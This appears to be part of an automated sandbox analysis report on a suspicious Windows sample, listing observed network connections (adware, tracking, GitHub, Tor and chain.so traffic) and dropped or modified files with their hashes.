| US | 8.8.8.8:53 | partner-tracking.lavasoft.com | udp |
| US | 8.8.8.8:53 | collect.avqtools.com | udp |
| DE | 116.203.251.147:443 | collect.avqtools.com | tcp |
| US | 104.16.148.130:443 | partner-tracking.lavasoft.com | tcp |
| DE | 116.203.251.147:443 | collect.avqtools.com | tcp |
| DE | 116.203.251.147:443 | collect.avqtools.com | tcp |
| US | 8.8.8.8:53 | drivers.avqtools.com | udp |
| DE | 116.203.251.147:443 | drivers.avqtools.com | tcp |
| US | 8.8.8.8:53 | 31.36.239.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 120.94.239.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 147.251.203.116.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.15.239.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ocsp.r2m03.amazontrust.com | udp |
| US | 8.8.8.8:53 | cloud.pchelpsoft.com | udp |
| NL | 18.238.246.206:80 | ocsp.r2m03.amazontrust.com | tcp |
| US | 104.22.18.110:443 | cloud.pchelpsoft.com | tcp |
| NL | 18.239.36.31:80 | api.playanext.com | tcp |
| NL | 18.239.36.31:80 | api.playanext.com | tcp |
| NL | 18.239.36.31:80 | api.playanext.com | tcp |
| US | 8.8.8.8:53 | files.playanext.com | udp |
| NL | 18.239.36.31:80 | api.playanext.com | tcp |
| US | 8.8.8.8:53 | 80.41.65.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.246.238.18.in-addr.arpa | udp |
| NL | 18.65.39.64:443 | files.playanext.com | tcp |
| DE | 116.203.251.147:443 | drivers.avqtools.com | tcp |
| US | 8.8.8.8:53 | 64.39.65.18.in-addr.arpa | udp |
| GB | 2.19.117.143:443 | aefd.nelreports.net | udp |
| DE | 116.203.251.147:443 | drivers.avqtools.com | tcp |
| DE | 116.203.251.147:443 | drivers.avqtools.com | tcp |
| DE | 116.203.251.147:443 | drivers.avqtools.com | tcp |
| US | 8.8.8.8:53 | ad.360yield.com | udp |
| US | 8.8.8.8:53 | hb-api.omnitagjs.com | udp |
| IE | 54.76.15.180:443 | ad.360yield.com | tcp |
| US | 34.120.63.153:443 | prebid.media.net | udp |
| FR | 185.255.84.150:443 | hb-api.omnitagjs.com | tcp |
| DE | 116.203.251.147:443 | drivers.avqtools.com | tcp |
| US | 8.8.8.8:53 | 180.15.76.54.in-addr.arpa | udp |
| GB | 142.250.200.34:443 | cm.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | s.richaudience.com | udp |
| DE | 157.90.0.38:443 | s.richaudience.com | tcp |
| DE | 157.90.0.38:443 | s.richaudience.com | tcp |
| US | 8.8.8.8:53 | googleads.g.doubleclick.net | udp |
| GB | 142.250.187.226:443 | googleads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | 38.0.90.157.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 226.187.250.142.in-addr.arpa | udp |
| US | 216.239.32.36:443 | region1.google-analytics.com | udp |
| N/A | 127.0.0.1:57367 | tcp | |
| N/A | 127.0.0.1:57369 | tcp | |
| N/A | 127.0.0.1:57366 | tcp | |
| N/A | 127.0.0.1:57372 | tcp | |
| N/A | 127.0.0.1:57392 | tcp | |
| N/A | 127.0.0.1:57394 | tcp | |
| N/A | 127.0.0.1:57396 | tcp | |
| N/A | 127.0.0.1:57397 | tcp | |
| N/A | 127.0.0.1:57400 | tcp | |
| N/A | 127.0.0.1:57402 | tcp | |
| N/A | 127.0.0.1:57407 | tcp | |
| N/A | 127.0.0.1:57409 | tcp | |
| US | 8.8.8.8:53 | th.bing.com | udp |
| US | 8.8.8.8:53 | r.bing.com | udp |
| GB | 92.123.128.190:443 | r.bing.com | tcp |
| GB | 92.123.128.185:443 | r.bing.com | tcp |
| US | 8.8.8.8:53 | 185.128.123.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 190.128.123.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | download.driversupport.com | udp |
| US | 13.107.246.65:443 | download.driversupport.com | tcp |
| US | 13.107.246.65:443 | download.driversupport.com | tcp |
| US | 8.8.8.8:53 | nav.smartscreen.microsoft.com | udp |
| GB | 51.11.108.188:443 | nav.smartscreen.microsoft.com | tcp |
| US | 8.8.8.8:53 | cdn.optimizely.com | udp |
| US | 8.8.8.8:53 | d3ti88jhu7fk5j.cloudfront.net | udp |
| US | 104.18.65.57:443 | cdn.optimizely.com | tcp |
| NL | 13.227.211.33:443 | d3ti88jhu7fk5j.cloudfront.net | tcp |
| NL | 13.227.211.33:443 | d3ti88jhu7fk5j.cloudfront.net | tcp |
| NL | 13.227.211.33:443 | d3ti88jhu7fk5j.cloudfront.net | tcp |
| NL | 13.227.211.33:443 | d3ti88jhu7fk5j.cloudfront.net | tcp |
| US | 8.8.8.8:53 | solveiqdriverstorage.blob.core.windows.net | udp |
| US | 8.8.8.8:53 | ajax.googleapis.com | udp |
| US | 8.8.8.8:53 | a17476411934.cdn.optimizely.com | udp |
| US | 20.150.70.228:443 | solveiqdriverstorage.blob.core.windows.net | tcp |
| GB | 142.250.187.234:443 | ajax.googleapis.com | tcp |
| GB | 142.250.187.234:443 | ajax.googleapis.com | tcp |
| GB | 142.250.180.4:443 | www.google.com | udp |
| US | 8.8.8.8:53 | connect.facebook.net | udp |
| US | 8.8.8.8:53 | consent.cookiefirst.com | udp |
| GB | 79.127.237.132:443 | consent.cookiefirst.com | tcp |
| GB | 163.70.151.21:443 | connect.facebook.net | tcp |
| US | 8.8.8.8:53 | 188.108.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 57.65.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 33.211.227.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 234.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.70.150.20.in-addr.arpa | udp |
| BE | 66.102.1.156:443 | stats.g.doubleclick.net | udp |
| GB | 79.127.237.132:443 | consent.cookiefirst.com | tcp |
| US | 8.8.8.8:53 | www.facebook.com | udp |
| GB | 163.70.147.35:443 | www.facebook.com | tcp |
| GB | 142.250.187.226:443 | googleads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | bat.bing.com | udp |
| US | 8.8.8.8:53 | edge.cookiefirst.com | udp |
| US | 8.8.8.8:53 | logx.optimizely.com | udp |
| US | 150.171.28.10:443 | bat.bing.com | tcp |
| US | 34.49.241.189:443 | logx.optimizely.com | tcp |
| GB | 216.58.204.67:443 | www.google.co.uk | udp |
| US | 8.8.8.8:53 | 132.237.127.79.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 35.147.70.163.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 189.241.49.34.in-addr.arpa | udp |
| CA | 64.18.87.10:443 | store.pchelpsoft.com | tcp |
| CA | 64.18.87.10:443 | store.pchelpsoft.com | tcp |
| CA | 64.18.87.10:443 | store.pchelpsoft.com | tcp |
| US | 8.8.8.8:53 | downloads.upclick.com | udp |
| CA | 64.18.87.12:443 | downloads.upclick.com | tcp |
| CA | 64.18.87.12:443 | downloads.upclick.com | tcp |
| CA | 64.18.87.12:443 | downloads.upclick.com | tcp |
| US | 8.8.8.8:53 | cdn.taboola.com | udp |
| US | 151.101.193.44:443 | cdn.taboola.com | tcp |
| US | 8.8.8.8:53 | 12.87.18.64.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 44.193.101.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | trc.taboola.com | udp |
| US | 8.8.8.8:53 | trc-events.taboola.com | udp |
| NL | 141.226.228.48:443 | trc-events.taboola.com | tcp |
| US | 8.8.8.8:53 | 48.228.226.141.in-addr.arpa | udp |
| US | 8.8.8.8:53 | aefd.nelreports.net | udp |
| GB | 2.19.117.143:443 | aefd.nelreports.net | udp |
| US | 216.239.32.36:443 | region1.google-analytics.com | udp |
| US | 8.8.8.8:53 | b.clarity.ms | udp |
| US | 4.153.129.168:443 | b.clarity.ms | tcp |
| N/A | 127.0.0.1:61732 | tcp | |
| N/A | 127.0.0.1:61734 | tcp | |
| US | 8.8.8.8:53 | api.playanext.com | udp |
| DE | 116.203.251.147:443 | drivers.avqtools.com | tcp |
| NL | 18.239.36.26:80 | api.playanext.com | tcp |
| NL | 18.239.36.26:80 | api.playanext.com | tcp |
| N/A | 127.0.0.1:61738 | tcp | |
| N/A | 127.0.0.1:61740 | tcp | |
| US | 8.8.8.8:53 | 26.36.239.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | nav.smartscreen.microsoft.com | udp |
| GB | 51.11.108.188:443 | nav.smartscreen.microsoft.com | tcp |
| GB | 92.123.128.175:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 175.128.123.92.in-addr.arpa | udp |
| GB | 92.123.128.175:443 | www.bing.com | udp |
| US | 8.8.8.8:53 | r.bing.com | udp |
| US | 8.8.8.8:53 | th.bing.com | udp |
| GB | 92.123.128.174:443 | th.bing.com | tcp |
| GB | 92.123.128.174:443 | th.bing.com | tcp |
| GB | 92.123.128.134:443 | th.bing.com | tcp |
| GB | 92.123.128.134:443 | th.bing.com | tcp |
| GB | 92.123.128.174:443 | th.bing.com | udp |
| US | 8.8.8.8:53 | 174.128.123.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 134.128.123.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | fpt.microsoft.com | udp |
| US | 52.167.30.171:443 | fpt.microsoft.com | tcp |
| GB | 92.123.128.134:443 | th.bing.com | udp |
| US | 8.8.8.8:53 | fpt2.microsoft.com | udp |
| US | 8.8.8.8:53 | 171.30.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.160.190.20.in-addr.arpa | udp |
| GB | 92.123.128.174:443 | th.bing.com | udp |
| US | 8.8.8.8:53 | about.gitlab.com | udp |
| US | 104.18.43.134:443 | about.gitlab.com | tcp |
| US | 104.18.43.134:443 | about.gitlab.com | tcp |
| US | 8.8.8.8:53 | 134.43.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | client-registry.mutinycdn.com | udp |
| US | 104.18.86.42:443 | cdn.cookielaw.org | tcp |
| US | 151.101.129.91:443 | client-registry.mutinycdn.com | tcp |
| US | 151.101.129.91:443 | client-registry.mutinycdn.com | tcp |
| US | 172.64.155.119:443 | privacyportal-eu.onetrust.com | tcp |
| US | 104.18.86.42:443 | cdn.cookielaw.org | tcp |
| US | 8.8.8.8:53 | cdn.bizible.com | udp |
| US | 8.8.8.8:53 | munchkin.marketo.net | udp |
| US | 8.8.8.8:53 | extend.vimeocdn.com | udp |
| US | 8.8.8.8:53 | images.ctfassets.net | udp |
| FR | 152.195.15.58:443 | cdn.bizible.com | tcp |
| US | 151.101.66.109:443 | extend.vimeocdn.com | tcp |
| GB | 23.204.224.203:443 | munchkin.marketo.net | tcp |
| NL | 18.239.36.79:443 | images.ctfassets.net | tcp |
| NL | 18.239.36.79:443 | images.ctfassets.net | tcp |
| NL | 18.239.36.79:443 | images.ctfassets.net | tcp |
| NL | 18.239.36.79:443 | images.ctfassets.net | tcp |
| NL | 18.239.36.79:443 | images.ctfassets.net | tcp |
| NL | 18.239.36.79:443 | images.ctfassets.net | tcp |
| US | 172.64.155.119:443 | privacyportal-eu.onetrust.com | tcp |
| US | 8.8.8.8:53 | 109.66.101.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.224.204.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.15.195.152.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 79.36.239.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | i.vimeocdn.com | udp |
| US | 151.101.192.217:443 | i.vimeocdn.com | tcp |
| US | 8.8.8.8:53 | cdn.bizibly.com | udp |
| US | 8.8.8.8:53 | vimeo.com | udp |
| US | 8.8.8.8:53 | s.swiftypecdn.com | udp |
| US | 162.159.138.60:443 | vimeo.com | tcp |
| US | 151.101.1.167:443 | s.swiftypecdn.com | tcp |
| US | 8.8.8.8:53 | 194-vvc-221.mktoresp.com | udp |
| US | 192.28.144.124:443 | 194-vvc-221.mktoresp.com | tcp |
| US | 151.101.1.167:443 | s.swiftypecdn.com | tcp |
| US | 8.8.8.8:53 | 60.138.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.192.101.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 124.144.28.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | cc.swiftype.com | udp |
| US | 169.48.219.66:443 | cc.swiftype.com | tcp |
| US | 216.239.32.36:443 | region1.google-analytics.com | udp |
| US | 216.239.32.36:443 | region1.google-analytics.com | tcp |
| US | 8.8.8.8:53 | ade.googlesyndication.com | udp |
| GB | 216.58.204.66:443 | ade.googlesyndication.com | tcp |
| GB | 216.58.204.66:443 | ade.googlesyndication.com | tcp |
| GB | 216.58.204.66:443 | ade.googlesyndication.com | udp |
| US | 8.8.8.8:53 | 66.204.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gitlab.com | udp |
| US | 8.8.8.8:53 | gitlab-requests.my.onetrust.com | udp |
| US | 216.239.32.36:443 | region1.google-analytics.com | udp |
| BE | 66.102.1.156:443 | stats.g.doubleclick.net | udp |
| US | 172.65.251.78:443 | gitlab.com | tcp |
| US | 8.8.8.8:53 | connect.facebook.net | udp |
| US | 8.8.8.8:53 | js.adsrvr.org | udp |
| GB | 216.58.204.67:443 | www.google.co.uk | udp |
| US | 150.171.28.10:443 | bat.bing.com | tcp |
| GB | 163.70.151.21:443 | connect.facebook.net | tcp |
| US | 104.18.32.137:443 | gitlab-requests.my.onetrust.com | tcp |
| NL | 18.239.67.100:443 | js.adsrvr.org | tcp |
| GB | 216.58.204.67:443 | www.google.co.uk | tcp |
| BE | 66.102.1.156:443 | stats.g.doubleclick.net | tcp |
| US | 216.239.32.36:443 | region1.google-analytics.com | tcp |
| US | 8.8.8.8:53 | insight.adsrvr.org | udp |
| US | 3.33.220.150:443 | insight.adsrvr.org | tcp |
| GB | 163.70.151.21:443 | connect.facebook.net | udp |
| US | 8.8.8.8:53 | player.vimeo.com | udp |
| US | 8.8.8.8:53 | f.vimeocdn.com | udp |
| US | 8.8.8.8:53 | www.facebook.com | udp |
| US | 151.101.130.109:443 | f.vimeocdn.com | tcp |
| US | 162.159.138.60:443 | player.vimeo.com | tcp |
| GB | 163.70.151.35:443 | www.facebook.com | tcp |
| US | 8.8.8.8:53 | 78.251.65.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 100.67.239.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.112.168.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 150.220.33.3.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 109.130.101.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 35.151.70.163.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | avatars.githubusercontent.com | udp |
| US | 8.8.8.8:53 | github.githubassets.com | udp |
| US | 185.199.111.133:443 | avatars.githubusercontent.com | tcp |
| US | 185.199.110.154:443 | github.githubassets.com | tcp |
| US | 8.8.8.8:53 | github-cloud.s3.amazonaws.com | udp |
| US | 185.199.110.154:443 | github.githubassets.com | tcp |
| US | 8.8.8.8:53 | user-images.githubusercontent.com | udp |
| US | 185.199.110.154:443 | github.githubassets.com | tcp |
| US | 185.199.110.154:443 | github.githubassets.com | tcp |
| US | 185.199.110.154:443 | github.githubassets.com | tcp |
| US | 185.199.110.154:443 | github.githubassets.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.111.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.110.199.185.in-addr.arpa | udp |
| US | 185.199.110.154:443 | github.githubassets.com | tcp |
| US | 8.8.8.8:53 | collector.github.com | udp |
| US | 140.82.113.22:443 | collector.github.com | tcp |
| US | 8.8.8.8:53 | 22.113.82.140.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.github.com | udp |
| GB | 20.26.156.210:443 | api.github.com | tcp |
| US | 8.8.8.8:53 | 210.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | camo.githubusercontent.com | udp |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | github-cloud.s3.amazonaws.com | udp |
| US | 8.8.8.8:53 | nav.smartscreen.microsoft.com | udp |
| GB | 51.140.242.104:443 | nav.smartscreen.microsoft.com | tcp |
| US | 8.8.8.8:53 | codeload.github.com | udp |
| GB | 20.26.156.216:443 | codeload.github.com | tcp |
| US | 8.8.8.8:53 | 216.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | nav.smartscreen.microsoft.com | udp |
| GB | 51.11.108.188:443 | nav.smartscreen.microsoft.com | tcp |
| GB | 92.123.128.152:443 | www.bing.com | udp |
| US | 8.8.8.8:53 | 152.128.123.92.in-addr.arpa | udp |
| N/A | 127.0.0.1:53781 | tcp | |
| US | 8.8.8.8:53 | prod.content-signature-chains.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.content-signature-chains.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.remote-settings.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.remote-settings.prod.webservices.mozgcp.net | udp |
| N/A | 127.0.0.1:53788 | tcp | |
| US | 8.8.8.8:53 | www.mozilla.org | udp |
| US | 151.101.129.91:443 | www.mozilla.org | tcp |
| US | 8.8.8.8:53 | www-mozilla.fastly-edge.com | udp |
| US | 8.8.8.8:53 | www-mozilla.fastly-edge.com | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 142.250.180.4:443 | www.google.com | udp |
| US | 8.8.8.8:53 | csp.withgoogle.com | udp |
| GB | 216.58.204.81:443 | csp.withgoogle.com | tcp |
| US | 8.8.8.8:53 | csp.withgoogle.com | udp |
| US | 8.8.8.8:53 | csp.withgoogle.com | udp |
| GB | 216.58.204.81:443 | csp.withgoogle.com | udp |
| US | 8.8.8.8:53 | ogads-pa.googleapis.com | udp |
| GB | 142.250.200.10:443 | ogads-pa.googleapis.com | tcp |
| GB | 142.250.200.10:443 | ogads-pa.googleapis.com | tcp |
| US | 8.8.8.8:53 | ogads-pa.googleapis.com | udp |
| US | 8.8.8.8:53 | ogads-pa.googleapis.com | udp |
| GB | 142.250.200.10:443 | ogads-pa.googleapis.com | udp |
| US | 8.8.8.8:53 | 226.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 10.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | play.google.com | udp |
| GB | 142.250.187.206:443 | play.google.com | tcp |
| US | 8.8.8.8:53 | play.google.com | udp |
| US | 8.8.8.8:53 | play.google.com | udp |
| GB | 142.250.187.206:443 | play.google.com | udp |
| US | 8.8.8.8:53 | consent.google.com | udp |
| GB | 172.217.16.238:443 | consent.google.com | tcp |
| US | 8.8.8.8:53 | consent.google.com | udp |
| US | 8.8.8.8:53 | consent.google.com | udp |
| GB | 172.217.16.238:443 | consent.google.com | udp |
| US | 8.8.8.8:53 | 238.16.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | location.services.mozilla.com | udp |
| US | 8.8.8.8:53 | prod.balrog.prod.cloudops.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.classify-client.prod.webservices.mozgcp.net | udp |
| US | 35.190.72.216:443 | prod.classify-client.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.balrog.prod.cloudops.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.classify-client.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | 216.72.190.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 201.181.244.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | prod.content-signature-chains.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | ciscobinary.openh264.org | udp |
| US | 8.8.8.8:53 | redirector.gvt1.com | udp |
| DE | 23.55.161.185:80 | ciscobinary.openh264.org | tcp |
| US | 8.8.8.8:53 | a19.dscg10.akamai.net | udp |
| GB | 142.250.200.14:443 | redirector.gvt1.com | tcp |
| US | 8.8.8.8:53 | redirector.gvt1.com | udp |
| US | 8.8.8.8:53 | a19.dscg10.akamai.net | udp |
| GB | 142.250.200.14:443 | redirector.gvt1.com | udp |
| US | 8.8.8.8:53 | r5---sn-aigzrn7l.gvt1.com | udp |
| GB | 173.194.5.234:443 | r5---sn-aigzrn7l.gvt1.com | tcp |
| US | 8.8.8.8:53 | r5.sn-aigzrn7l.gvt1.com | udp |
| US | 8.8.8.8:53 | r5.sn-aigzrn7l.gvt1.com | udp |
| GB | 173.194.5.234:443 | r5.sn-aigzrn7l.gvt1.com | udp |
| US | 8.8.8.8:53 | 14.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 234.5.194.173.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 185.161.55.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | github.githubassets.com | udp |
| US | 8.8.8.8:53 | avatars.githubusercontent.com | udp |
| US | 185.199.110.154:443 | github.githubassets.com | tcp |
| US | 185.199.110.154:443 | github.githubassets.com | tcp |
| US | 185.199.110.154:443 | github.githubassets.com | tcp |
| US | 185.199.110.154:443 | github.githubassets.com | tcp |
| US | 185.199.110.154:443 | github.githubassets.com | tcp |
| US | 185.199.110.154:443 | github.githubassets.com | tcp |
| US | 8.8.8.8:53 | github.githubassets.com | udp |
| US | 185.199.111.133:443 | avatars.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | avatars.githubusercontent.com | udp |
| US | 8.8.8.8:53 | collector.github.com | udp |
| US | 140.82.113.21:443 | collector.github.com | tcp |
| US | 8.8.8.8:53 | glb-db52c2cf8be544.github.com | udp |
| US | 8.8.8.8:53 | api.github.com | udp |
| US | 140.82.113.21:443 | collector.github.com | tcp |
| US | 8.8.8.8:53 | glb-db52c2cf8be544.github.com | udp |
| GB | 20.26.156.210:443 | api.github.com | tcp |
| US | 8.8.8.8:53 | api.github.com | udp |
| US | 8.8.8.8:53 | api.github.com | udp |
| US | 8.8.8.8:53 | 21.113.82.140.in-addr.arpa | udp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.110.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | glb-db52c2cf8be544.github.com | udp |
| US | 8.8.8.8:53 | glb-db52c2cf8be544.github.com | udp |
| N/A | 127.0.0.1:9050 | tcp | |
| DE | 5.9.151.241:4223 | tcp | |
| US | 154.35.175.225:443 | tcp | |
| N/A | 127.0.0.1:55774 | tcp | |
| CA | 198.96.155.3:5001 | tcp | |
| US | 8.8.8.8:53 | 3.155.96.198.in-addr.arpa | udp |
| CZ | 87.236.195.203:443 | tcp | |
| US | 8.8.8.8:53 | 203.195.236.87.in-addr.arpa | udp |
| N/A | 127.0.0.1:9050 | tcp | |
| N/A | 127.0.0.1:9050 | tcp | |
| US | 8.8.8.8:53 | chain.so | udp |
| US | 172.67.40.90:80 | chain.so | tcp |
| US | 172.67.40.90:80 | chain.so | tcp |
| US | 8.8.8.8:53 | chain.so | udp |
| US | 8.8.8.8:53 | chain.so | udp |
| US | 172.67.40.90:443 | chain.so | tcp |
| US | 172.67.40.90:443 | chain.so | udp |
| US | 8.8.8.8:53 | static.cloudflareinsights.com | udp |
| US | 104.16.80.73:443 | static.cloudflareinsights.com | tcp |
| US | 8.8.8.8:53 | static.cloudflareinsights.com | udp |
| US | 8.8.8.8:53 | static.cloudflareinsights.com | udp |
| US | 8.8.8.8:53 | 90.40.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.80.16.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ws.chain.so | udp |
| US | 8.8.8.8:53 | ws.chain.so | udp |
| US | 172.67.40.90:443 | ws.chain.so | tcp |
| US | 8.8.8.8:53 | ws.chain.so | udp |
| US | 172.67.40.90:443 | ws.chain.so | tcp |
| US | 172.67.40.90:443 | ws.chain.so | udp |
| US | 104.16.80.73:443 | static.cloudflareinsights.com | tcp |
| US | 8.8.8.8:53 | challenges.cloudflare.com | udp |
| US | 104.18.95.41:443 | challenges.cloudflare.com | tcp |
| US | 8.8.8.8:53 | challenges.cloudflare.com | udp |
| US | 8.8.8.8:53 | challenges.cloudflare.com | udp |
| US | 8.8.8.8:53 | 41.95.18.104.in-addr.arpa | udp |
| US | 104.18.95.41:443 | challenges.cloudflare.com | udp |
| US | 172.67.40.90:443 | ws.chain.so | tcp |
| N/A | 127.0.0.1:9050 | tcp | |
| US | 172.67.40.90:443 | ws.chain.so | tcp |
| US | 172.67.40.90:443 | ws.chain.so | tcp |
Files
memory/5304-0-0x00000001401A1000-0x000000014068C000-memory.dmp
memory/5304-2-0x00007FFDF5E80000-0x00007FFDF5E82000-memory.dmp
memory/5304-1-0x00007FFDF5E70000-0x00007FFDF5E72000-memory.dmp
memory/5304-7-0x0000000140000000-0x0000000140EBF000-memory.dmp
memory/5304-8-0x0000000140000000-0x0000000140EBF000-memory.dmp
memory/5304-9-0x00000001401A1000-0x000000014068C000-memory.dmp
memory/5304-10-0x0000000140000000-0x0000000140EBF000-memory.dmp
memory/5304-13-0x0000000140000000-0x0000000140EBF000-memory.dmp
\??\pipe\crashpad_3408_RQOJPXRDMXXFEAEL
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports
| MD5 | d751713988987e9331980363e24189ce |
| SHA1 | 97d170e1550eee4afc0af065b78cda302a97674c |
| SHA256 | 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945 |
| SHA512 | b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState
| MD5 | 95bf5c77919eff7deb233a5f6dd58b53 |
| SHA1 | ed6fcfaf6a185ae9d8847221e9f042334af7b308 |
| SHA256 | 6c579eeb667a875e71de1ee453b6a8fbc6b81768ef114139f62b8442fe6e0d99 |
| SHA512 | 4e4634dbc9c53093dfc2818e5d15131980aba18b06415dc89afc7d4af5968d361c529cb45e3099f6a567e5c2f5c5c991987700590b2826be6f46e75711b3f8e6 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000007
| MD5 | e579aca9a74ae76669750d8879e16bf3 |
| SHA1 | 0b8f462b46ec2b2dbaa728bea79d611411bae752 |
| SHA256 | 6e51c7866705bf0098febfaf05cf4652f96e69ac806c837bfb1199b6e21e6aaf |
| SHA512 | df22f1dff74631bc14433499d1f61609de71e425410067fd08ec193d100b70d98672228906081c309a06bcba03c097ace885240a3ce71e0da4fdb8a022fc9640 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | 767ef814f206032968f79c0cb8a633e1 |
| SHA1 | abd90bfd8869c4e1966b0d7e0c3abee0cf50fdce |
| SHA256 | 0cd426e80770a465960a4fc87e2d1849ea624a9ab89262ed5065fea4278023d0 |
| SHA512 | c4413a1a8d97565ee09a1ec74a95dd23dbb411116e7ab055ec77592985302cd91f7e213fa38562d469ef586bf2c90462c32b6e2feb223e23b655d9f40f7f8ebb |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | df3fe9c341936b973dc262ca8e55d52b |
| SHA1 | df4cb4d3af92475e73268e971b95257ec2e89ac1 |
| SHA256 | 1ba5628adc29cfee442de9b966c89907ac133e4d249b7fe9ad1839cc8b0b2358 |
| SHA512 | 18249e7bcfcd58c0a999a557f3652d2cadf98f12bef148a230511879aa77fcd70b7da5a800c1629ad22a2af0eff96620c58373dbf5ef37cb6e3b4cd64b0ff29f |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 2b96c433d753ab4ba64f5cb6e9690ca4 |
| SHA1 | f26a32c3e03d53987f65554145ec41d66727e86f |
| SHA256 | 2435ceec511409fa26821c792f6c2504b067365c034a5c5f0256266a4470d197 |
| SHA512 | 4bcbae8e61cf1b1ff53ef308f7e8f28ade18aeedbde2739e7383a1e4683d4c54250fffc3349360ed8a638abfb69252e062ee52852c43e74eadc121ce77994de4 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences
| MD5 | 424ed21228f7f7d764518104ea46365d |
| SHA1 | 0549022cc7b317d19c421c685700802692cebd75 |
